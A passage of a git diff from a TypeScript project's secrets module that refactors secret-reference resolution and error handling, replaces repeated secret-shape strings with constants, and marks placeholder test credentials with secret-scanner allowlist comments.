// Arrays are compacted to preserve predictable index semantics. - cursor.splice(arrayIndex, 1); + arrayTarget.array.splice(arrayTarget.index, 1); return true; } if (!isRecord(cursor)) { diff --git a/src/secrets/resolve-secret-input-string.ts b/src/secrets/resolve-secret-input-string.ts new file mode 100644 index 00000000000..0f23404acf2 --- /dev/null +++ b/src/secrets/resolve-secret-input-string.ts @@ -0,0 +1,41 @@ +import type { OpenClawConfig } from "../config/config.js"; +import { + normalizeSecretInputString, + resolveSecretInputRef, + type SecretRef, +} from "../config/types.secrets.js"; +import { resolveSecretRefString } from "./resolve.js"; + +type SecretDefaults = NonNullable["defaults"]; + +export async function resolveSecretInputString(params: { + config: OpenClawConfig; + value: unknown; + env: NodeJS.ProcessEnv; + defaults?: SecretDefaults; + normalize?: (value: unknown) => string | undefined; + onResolveRefError?: (error: unknown, ref: SecretRef) => never; +}): Promise { + const normalize = params.normalize ?? normalizeSecretInputString; + const { ref } = resolveSecretInputRef({ + value: params.value, + defaults: params.defaults ?? params.config.secrets?.defaults, + }); + if (!ref) { + return normalize(params.value); + } + + let resolved: string; + try { + resolved = await resolveSecretRefString(ref, { + config: params.config, + env: params.env, + }); + } catch (error) { + if (params.onResolveRefError) { + return params.onResolveRefError(error, ref); + } + throw error; + } + return normalize(resolved); +} diff --git a/src/secrets/resolve.test.ts b/src/secrets/resolve.test.ts index 716ab5af7fa..376f591b73e 100644 --- a/src/secrets/resolve.test.ts +++ b/src/secrets/resolve.test.ts @@ -153,7 +153,7 @@ describe("secret ref resolver", () => { { source: "env", provider: "default", id: "OPENAI_API_KEY" }, { config, - env: { OPENAI_API_KEY: "sk-env-value" }, + env: { OPENAI_API_KEY: "sk-env-value" }, // pragma: allowlist secret }, ); expect(value).toBe("sk-env-value"); @@ -167,7 +167,7 @@ describe("secret ref resolver", () => { JSON.stringify({ providers: { openai: { - apiKey: "sk-file-value", + apiKey: "sk-file-value", // pragma: allowlist secret }, }, }), @@ -375,7 +375,7 @@ describe("secret ref resolver", () => { JSON.stringify({ providers: { openai: { - apiKey: "sk-file-value", + apiKey: "sk-file-value", // pragma: allowlist secret }, }, }), diff --git a/src/secrets/resolve.ts b/src/secrets/resolve.ts index 8b2cb9c6a5d..039875c464c 100644 --- a/src/secrets/resolve.ts +++ b/src/secrets/resolve.ts @@ -127,6 +127,33 @@ function refResolutionError(params: { return new SecretRefResolutionError(params); } +function throwUnknownProviderResolutionError(params: { + source: SecretRefSource; + provider: string; + err: unknown; +}): never { + if (isSecretResolutionError(params.err)) { + throw params.err; + } + throw providerResolutionError({ + source: params.source, + provider: params.provider, + message: describeUnknownError(params.err), + cause: params.err, + }); +} + +async function readFileStatOrThrow(pathname: string, label: string) { + const stat = await safeStat(pathname); + if (!stat.ok) { + throw new Error(`${label} is not readable: ${pathname}`); + } + if (stat.isDir) { + throw new Error(`${label} must be a file: ${pathname}`); + } + return stat; +} + function isAbsolutePathname(value: string): boolean { return ( path.isAbsolute(value) || @@ -189,13 +216,7 @@ async function assertSecurePath(params: { } let effectivePath = params.targetPath; - let stat = await safeStat(effectivePath); - if (!stat.ok) { - throw new Error(`${params.label} is not readable: ${effectivePath}`); - } - if (stat.isDir) { - throw new Error(`${params.label} must be a file: ${effectivePath}`); - } + let stat = await readFileStatOrThrow(effectivePath, params.label); if (stat.isSymlink) { if (!params.allowSymlinkPath) { throw new Error(`${params.label} must not be a symlink: ${effectivePath}`); @@ -208,13 +229,7 @@ async function assertSecurePath(params: { if (!isAbsolutePathname(effectivePath)) { throw new Error(`${params.label} resolved symlink target must be an absolute path.`); } - stat = await safeStat(effectivePath); - if (!stat.ok) { - throw new Error(`${params.label} is not readable: ${effectivePath}`); - } - if (stat.isDir) { - throw new Error(`${params.label} must be a file: ${effectivePath}`); - } + stat = await readFileStatOrThrow(effectivePath, params.label); if (stat.isSymlink) { throw new Error(`${params.label} symlink target must not be a symlink: ${effectivePath}`); } @@ -372,14 +387,10 @@ async function resolveFileRefs(params: { cache: params.cache, }); } catch (err) { - if (isSecretResolutionError(err)) { - throw err; - } - throw providerResolutionError({ + throwUnknownProviderResolutionError({ source: "file", provider: params.providerName, - message: describeUnknownError(err), - cause: err, + err, }); } const mode = params.providerConfig.mode ?? "json"; @@ -664,14 +675,10 @@ async function resolveExecRefs(params: { allowSymlinkPath: params.providerConfig.allowSymlinkCommand, }); } catch (err) { - if (isSecretResolutionError(err)) { - throw err; - } - throw providerResolutionError({ + throwUnknownProviderResolutionError({ source: "exec", provider: params.providerName, - message: describeUnknownError(err), - cause: err, + err, }); } @@ -724,14 +731,10 @@ async function resolveExecRefs(params: { maxOutputBytes, }); } catch (err) { - if (isSecretResolutionError(err)) { - throw err; - } - throw providerResolutionError({ + throwUnknownProviderResolutionError({ source: "exec", provider: params.providerName, - message: describeUnknownError(err), - cause: err, + err, }); } if (result.termination === "timeout") { @@ -765,14 +768,10 @@ async function resolveExecRefs(params: { jsonOnly, }); } catch (err) { - if (isSecretResolutionError(err)) { - throw err; - } - throw providerResolutionError({ + throwUnknownProviderResolutionError({ source: "exec", provider: params.providerName, - message: describeUnknownError(err), - cause: err, + err, }); } const resolved = new Map(); @@ -822,14 +821,10 @@ async function resolveProviderRefs(params: { message: `Unsupported secret provider source "${String((params.providerConfig as { source?: unknown }).source)}".`, }); } catch (err) { - if (isSecretResolutionError(err)) { - throw err; - } - throw providerResolutionError({ + throwUnknownProviderResolutionError({ source: params.source, provider: params.providerName, - message: describeUnknownError(err), - cause: err, + err, }); } } diff --git a/src/secrets/runtime.test.ts b/src/secrets/runtime.test.ts index 40e766179e2..e1ca5774a75 100644 --- a/src/secrets/runtime.test.ts +++ b/src/secrets/runtime.test.ts @@ -122,21 +122,21 @@ describe("secrets runtime snapshot", () => { const snapshot = await prepareSecretsRuntimeSnapshot({ config, env: { - OPENAI_API_KEY: "sk-env-openai", - GITHUB_TOKEN: "ghp-env-token", - REVIEW_SKILL_API_KEY: "sk-skill-ref", - MEMORY_REMOTE_API_KEY: "mem-ref-key", - TALK_API_KEY: "talk-ref-key", - TALK_PROVIDER_API_KEY: "talk-provider-ref-key", + OPENAI_API_KEY: "sk-env-openai", // pragma: allowlist secret + GITHUB_TOKEN: "ghp-env-token", // pragma: allowlist secret + REVIEW_SKILL_API_KEY: "sk-skill-ref", // pragma: allowlist secret + MEMORY_REMOTE_API_KEY: "mem-ref-key", // pragma: allowlist secret + TALK_API_KEY: "talk-ref-key", // pragma: allowlist secret + TALK_PROVIDER_API_KEY: "talk-provider-ref-key", // pragma: allowlist secret REMOTE_GATEWAY_TOKEN: "remote-token-ref", - REMOTE_GATEWAY_PASSWORD: "remote-password-ref", + REMOTE_GATEWAY_PASSWORD: "remote-password-ref", // pragma: allowlist secret TELEGRAM_BOT_TOKEN_REF: "telegram-bot-ref", - TELEGRAM_WEBHOOK_SECRET_REF: "telegram-webhook-ref", + TELEGRAM_WEBHOOK_SECRET_REF: "telegram-webhook-ref", // pragma: allowlist secret TELEGRAM_WORK_BOT_TOKEN_REF: "telegram-work-ref", - SLACK_SIGNING_SECRET_REF: "slack-signing-ref", + SLACK_SIGNING_SECRET_REF: "slack-signing-ref", // pragma: allowlist secret SLACK_WORK_BOT_TOKEN_REF: "slack-work-bot-ref", SLACK_WORK_APP_TOKEN_REF: "slack-work-app-ref", - WEB_SEARCH_API_KEY: "web-search-ref", + WEB_SEARCH_API_KEY: "web-search-ref", // pragma: allowlist secret }, agentDirs: ["/tmp/openclaw-agent-main"], loadAuthStore: () => @@ -305,7 +305,7 @@ describe("secrets runtime snapshot", () => { }, }), env: { - WEB_SEARCH_API_KEY: "web-search-ref", + WEB_SEARCH_API_KEY: "web-search-ref", // pragma: allowlist secret }, agentDirs: ["/tmp/openclaw-agent-main"], loadAuthStore: () => ({ version: 1, profiles: {} }), @@ -343,8 +343,8 @@ describe("secrets runtime snapshot", () => { }, }), env: { - WEB_SEARCH_API_KEY: "web-search-ref", - WEB_SEARCH_GEMINI_API_KEY: "web-search-gemini-ref", + WEB_SEARCH_API_KEY: "web-search-ref", // pragma: allowlist secret + WEB_SEARCH_GEMINI_API_KEY: "web-search-gemini-ref", // pragma: allowlist secret }, agentDirs: ["/tmp/openclaw-agent-main"], loadAuthStore: () => ({ version: 1, profiles: {} }), @@ -374,7 +374,7 @@ describe("secrets runtime snapshot", () => { }, }), env: { - WEB_SEARCH_GEMINI_API_KEY: "web-search-gemini-ref", + WEB_SEARCH_GEMINI_API_KEY: "web-search-gemini-ref", // pragma: allowlist secret }, agentDirs: ["/tmp/openclaw-agent-main"], loadAuthStore: () => ({ version: 1, profiles: {} }), @@ -399,7 +399,7 @@ describe("secrets runtime snapshot", () => { { providers: { openai: { - apiKey: "sk-from-file-provider", + apiKey: "sk-from-file-provider", // pragma: allowlist secret }, }, }, @@ -494,7 +494,7 @@ describe("secrets runtime snapshot", () => { }, }, }), - env: { OPENAI_API_KEY: "sk-runtime" }, + env: { OPENAI_API_KEY: "sk-runtime" }, // pragma: allowlist secret agentDirs: ["/tmp/openclaw-agent-main"], loadAuthStore: () => loadAuthStoreWithProfiles({ @@ -603,7 +603,7 @@ describe("secrets runtime snapshot", () => { auth: { mode: "password", token: "local-token", - password: "local-password", + password: "local-password", // pragma: allowlist secret }, remote: { enabled: true, @@ -642,7 +642,7 @@ describe("secrets runtime snapshot", () => { }, }), env: { - GATEWAY_PASSWORD_REF: "resolved-gateway-password", + GATEWAY_PASSWORD_REF: "resolved-gateway-password", // pragma: allowlist secret }, agentDirs: ["/tmp/openclaw-agent-main"], loadAuthStore: () => ({ version: 1, profiles: {} }), @@ -680,7 +680,7 @@ describe("secrets runtime snapshot", () => { auth: { mode: "password", token: { source: "env", provider: "default", id: "GATEWAY_TOKEN_REF" }, - password: "password-123", + password: "password-123", // pragma: allowlist secret }, }, }), @@ -728,7 +728,7 @@ describe("secrets runtime snapshot", () => { }, }), env: { - GATEWAY_PASSWORD_REF: "resolved-gateway-password", + GATEWAY_PASSWORD_REF: "resolved-gateway-password", // pragma: allowlist secret }, agentDirs: ["/tmp/openclaw-agent-main"], loadAuthStore: () => ({ version: 1, profiles: {} }), @@ -822,7 +822,7 @@ describe("secrets runtime snapshot", () => { }), env: { REMOTE_TOKEN: "resolved-remote-token", - REMOTE_PASSWORD: "resolved-remote-password", + REMOTE_PASSWORD: "resolved-remote-password", // pragma: allowlist secret }, agentDirs: ["/tmp/openclaw-agent-main"], loadAuthStore: () => ({ version: 1, profiles: {} }), @@ -846,7 +846,7 @@ describe("secrets runtime snapshot", () => { }, }), env: { - REMOTE_PASSWORD: "resolved-remote-password", + REMOTE_PASSWORD: "resolved-remote-password", // pragma: allowlist secret }, agentDirs: ["/tmp/openclaw-agent-main"], loadAuthStore: () => ({ version: 1, profiles: {} }), @@ -980,8 +980,8 @@ describe("secrets runtime snapshot", () => { }, }), env: { - NEXTCLOUD_BOT_SECRET: "resolved-nextcloud-bot-secret", - NEXTCLOUD_API_PASSWORD: "resolved-nextcloud-api-password", + NEXTCLOUD_BOT_SECRET: "resolved-nextcloud-bot-secret", // pragma: allowlist secret + NEXTCLOUD_API_PASSWORD: "resolved-nextcloud-api-password", // pragma: allowlist secret }, agentDirs: ["/tmp/openclaw-agent-main"], loadAuthStore: () => ({ version: 1, profiles: {} }), @@ -1022,8 +1022,8 @@ describe("secrets runtime snapshot", () => { }, }), env: { - NEXTCLOUD_WORK_BOT_SECRET: "resolved-nextcloud-work-bot-secret", - NEXTCLOUD_WORK_API_PASSWORD: "resolved-nextcloud-work-api-password", + NEXTCLOUD_WORK_BOT_SECRET: "resolved-nextcloud-work-bot-secret", // pragma: allowlist secret + NEXTCLOUD_WORK_API_PASSWORD: "resolved-nextcloud-work-api-password", // pragma: allowlist secret }, agentDirs: ["/tmp/openclaw-agent-main"], loadAuthStore: () => ({ version: 1, profiles: {} }), @@ -1058,7 +1058,7 @@ describe("secrets runtime snapshot", () => { }), env: { REMOTE_GATEWAY_TOKEN: "tailscale-remote-token", - REMOTE_GATEWAY_PASSWORD: "tailscale-remote-password", + REMOTE_GATEWAY_PASSWORD: "tailscale-remote-password", // pragma: allowlist secret }, agentDirs: ["/tmp/openclaw-agent-main"], loadAuthStore: () => ({ version: 1, profiles: {} }), @@ -1931,7 +1931,7 @@ describe("secrets runtime snapshot", () => { list: [{ id: "worker" }], }, }, - env: { OPENAI_API_KEY: "sk-runtime-worker" }, + env: { OPENAI_API_KEY: "sk-runtime-worker" }, // pragma: allowlist secret }); await expect(fs.access(workerStorePath)).rejects.toMatchObject({ code: "ENOENT" }); diff --git a/src/secrets/secret-value.ts b/src/secrets/secret-value.ts index 9713451e892..9a192fede16 100644 --- a/src/secrets/secret-value.ts +++ b/src/secrets/secret-value.ts @@ -1,6 +1,6 @@ import { isNonEmptyString, isRecord } from "./shared.js"; -export type SecretExpectedResolvedValue = "string" | "string-or-object"; +export type SecretExpectedResolvedValue = "string" | "string-or-object"; // pragma: allowlist secret export function isExpectedResolvedSecretValue( value: unknown, diff --git a/src/secrets/storage-scan.ts b/src/secrets/storage-scan.ts index 15c02f1922c..ccbfc544f6d 100644 --- a/src/secrets/storage-scan.ts +++ b/src/secrets/storage-scan.ts @@ -1,49 +1,16 @@ import fs from "node:fs"; import path from "node:path"; -import { listAgentIds, resolveAgentDir } from "../agents/agent-scope.js"; -import { resolveAuthStorePath } from "../agents/auth-profiles/paths.js"; import type { OpenClawConfig } from "../config/config.js"; import { resolveUserPath } from "../utils.js"; +import { listAuthProfileStorePaths as listAuthProfileStorePathsFromAuthStorePaths } from "./auth-store-paths.js"; +import { parseEnvValue } from "./shared.js"; export function parseEnvAssignmentValue(raw: string): string { - const trimmed = raw.trim(); - if ( - (trimmed.startsWith('"') && trimmed.endsWith('"')) || - (trimmed.startsWith("'") && trimmed.endsWith("'")) - ) { - return trimmed.slice(1, -1); - } - return trimmed; + return parseEnvValue(raw); } export function listAuthProfileStorePaths(config: OpenClawConfig, stateDir: string): string[] { - const paths = new Set(); - // Scope default auth store discovery to the provided stateDir instead of - // ambient process env, so scans do not include unrelated host-global stores. - paths.add(path.join(resolveUserPath(stateDir), "agents", "main", "agent", "auth-profiles.json")); - - const agentsRoot = path.join(resolveUserPath(stateDir), "agents"); - if (fs.existsSync(agentsRoot)) { - for (const entry of fs.readdirSync(agentsRoot, { withFileTypes: true })) { - if (!entry.isDirectory()) { - continue; - } - paths.add(path.join(agentsRoot, entry.name, "agent", "auth-profiles.json")); - } - } - - for (const agentId of listAgentIds(config)) { - if (agentId === "main") { - paths.add( - path.join(resolveUserPath(stateDir), "agents", "main", "agent", "auth-profiles.json"), - ); - continue; - } - const agentDir = resolveAgentDir(config, agentId); - paths.add(resolveUserPath(resolveAuthStorePath(agentDir))); - } - - return [...paths]; + return listAuthProfileStorePathsFromAuthStorePaths(config, stateDir); } export function listLegacyAuthJsonPaths(stateDir: string): string[] { diff --git a/src/secrets/target-registry-data.ts b/src/secrets/target-registry-data.ts index 53eb4307751..61ccb1f9b66 100644 --- a/src/secrets/target-registry-data.ts +++ b/src/secrets/target-registry-data.ts @@ -1,5 +1,8 @@ import type { SecretTargetRegistryEntry } from "./target-registry-types.js"; +const SECRET_INPUT_SHAPE = "secret_input"; // pragma: allowlist secret +const SIBLING_REF_SHAPE = "sibling_ref"; // pragma: allowlist secret + const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ { id: "auth-profiles.api_key.key", @@ -7,7 +10,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ configFile: "auth-profiles.json", pathPattern: "profiles.*.key", refPathPattern: "profiles.*.keyRef", - secretShape: "sibling_ref", + secretShape: SIBLING_REF_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -20,7 +23,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ configFile: "auth-profiles.json", pathPattern: "profiles.*.token", refPathPattern: "profiles.*.tokenRef", - secretShape: "sibling_ref", + secretShape: SIBLING_REF_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -32,7 +35,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "agents.defaults.memorySearch.remote.apiKey", configFile: "openclaw.json", pathPattern: "agents.defaults.memorySearch.remote.apiKey", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -43,7 +46,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "agents.list[].memorySearch.remote.apiKey", configFile: "openclaw.json", pathPattern: "agents.list[].memorySearch.remote.apiKey", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -54,7 +57,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.bluebubbles.accounts.*.password", configFile: "openclaw.json", pathPattern: "channels.bluebubbles.accounts.*.password", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -65,7 +68,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.bluebubbles.password", configFile: "openclaw.json", pathPattern: "channels.bluebubbles.password", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -76,7 +79,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.discord.accounts.*.pluralkit.token", configFile: "openclaw.json", pathPattern: "channels.discord.accounts.*.pluralkit.token", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -87,7 +90,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.discord.accounts.*.token", configFile: "openclaw.json", pathPattern: "channels.discord.accounts.*.token", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -98,7 +101,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.discord.accounts.*.voice.tts.elevenlabs.apiKey", configFile: "openclaw.json", pathPattern: "channels.discord.accounts.*.voice.tts.elevenlabs.apiKey", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -109,7 +112,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.discord.accounts.*.voice.tts.openai.apiKey", configFile: "openclaw.json", pathPattern: "channels.discord.accounts.*.voice.tts.openai.apiKey", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -120,7 +123,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.discord.pluralkit.token", configFile: "openclaw.json", pathPattern: "channels.discord.pluralkit.token", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -131,7 +134,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.discord.token", configFile: "openclaw.json", pathPattern: "channels.discord.token", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -142,7 +145,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.discord.voice.tts.elevenlabs.apiKey", configFile: "openclaw.json", pathPattern: "channels.discord.voice.tts.elevenlabs.apiKey", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -153,7 +156,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.discord.voice.tts.openai.apiKey", configFile: "openclaw.json", pathPattern: "channels.discord.voice.tts.openai.apiKey", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -164,7 +167,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.feishu.accounts.*.appSecret", configFile: "openclaw.json", pathPattern: "channels.feishu.accounts.*.appSecret", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -175,7 +178,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.feishu.accounts.*.verificationToken", configFile: "openclaw.json", pathPattern: "channels.feishu.accounts.*.verificationToken", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -186,7 +189,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.feishu.appSecret", configFile: "openclaw.json", pathPattern: "channels.feishu.appSecret", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -197,7 +200,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.feishu.verificationToken", configFile: "openclaw.json", pathPattern: "channels.feishu.verificationToken", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -210,7 +213,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ configFile: "openclaw.json", pathPattern: "channels.googlechat.accounts.*.serviceAccount", refPathPattern: "channels.googlechat.accounts.*.serviceAccountRef", - secretShape: "sibling_ref", + secretShape: SIBLING_REF_SHAPE, expectedResolvedValue: "string-or-object", includeInPlan: true, includeInConfigure: true, @@ -223,7 +226,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ configFile: "openclaw.json", pathPattern: "channels.googlechat.serviceAccount", refPathPattern: "channels.googlechat.serviceAccountRef", - secretShape: "sibling_ref", + secretShape: SIBLING_REF_SHAPE, expectedResolvedValue: "string-or-object", includeInPlan: true, includeInConfigure: true, @@ -234,7 +237,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.irc.accounts.*.nickserv.password", configFile: "openclaw.json", pathPattern: "channels.irc.accounts.*.nickserv.password", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -245,7 +248,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.irc.accounts.*.password", configFile: "openclaw.json", pathPattern: "channels.irc.accounts.*.password", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -256,7 +259,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.irc.nickserv.password", configFile: "openclaw.json", pathPattern: "channels.irc.nickserv.password", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -267,7 +270,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.irc.password", configFile: "openclaw.json", pathPattern: "channels.irc.password", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -278,7 +281,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.mattermost.accounts.*.botToken", configFile: "openclaw.json", pathPattern: "channels.mattermost.accounts.*.botToken", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -289,7 +292,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.mattermost.botToken", configFile: "openclaw.json", pathPattern: "channels.mattermost.botToken", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -300,7 +303,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.matrix.accounts.*.password", configFile: "openclaw.json", pathPattern: "channels.matrix.accounts.*.password", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -311,7 +314,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.matrix.password", configFile: "openclaw.json", pathPattern: "channels.matrix.password", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -322,7 +325,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.msteams.appPassword", configFile: "openclaw.json", pathPattern: "channels.msteams.appPassword", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -333,7 +336,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.nextcloud-talk.accounts.*.apiPassword", configFile: "openclaw.json", pathPattern: "channels.nextcloud-talk.accounts.*.apiPassword", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -344,7 +347,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.nextcloud-talk.accounts.*.botSecret", configFile: "openclaw.json", pathPattern: "channels.nextcloud-talk.accounts.*.botSecret", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -355,7 +358,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.nextcloud-talk.apiPassword", configFile: "openclaw.json", pathPattern: "channels.nextcloud-talk.apiPassword", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -366,7 +369,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.nextcloud-talk.botSecret", configFile: "openclaw.json", pathPattern: "channels.nextcloud-talk.botSecret", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -377,7 +380,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.slack.accounts.*.appToken", configFile: "openclaw.json", pathPattern: "channels.slack.accounts.*.appToken", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -388,7 +391,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.slack.accounts.*.botToken", configFile: "openclaw.json", pathPattern: "channels.slack.accounts.*.botToken", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -399,7 +402,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.slack.accounts.*.signingSecret", configFile: "openclaw.json", pathPattern: "channels.slack.accounts.*.signingSecret", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -410,7 +413,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.slack.accounts.*.userToken", configFile: "openclaw.json", pathPattern: "channels.slack.accounts.*.userToken", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -421,7 +424,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.slack.appToken", configFile: "openclaw.json", pathPattern: "channels.slack.appToken", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -432,7 +435,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.slack.botToken", configFile: "openclaw.json", pathPattern: "channels.slack.botToken", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -443,7 +446,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.slack.signingSecret", configFile: "openclaw.json", pathPattern: "channels.slack.signingSecret", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -454,7 +457,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.slack.userToken", configFile: "openclaw.json", pathPattern: "channels.slack.userToken", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -465,7 +468,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: 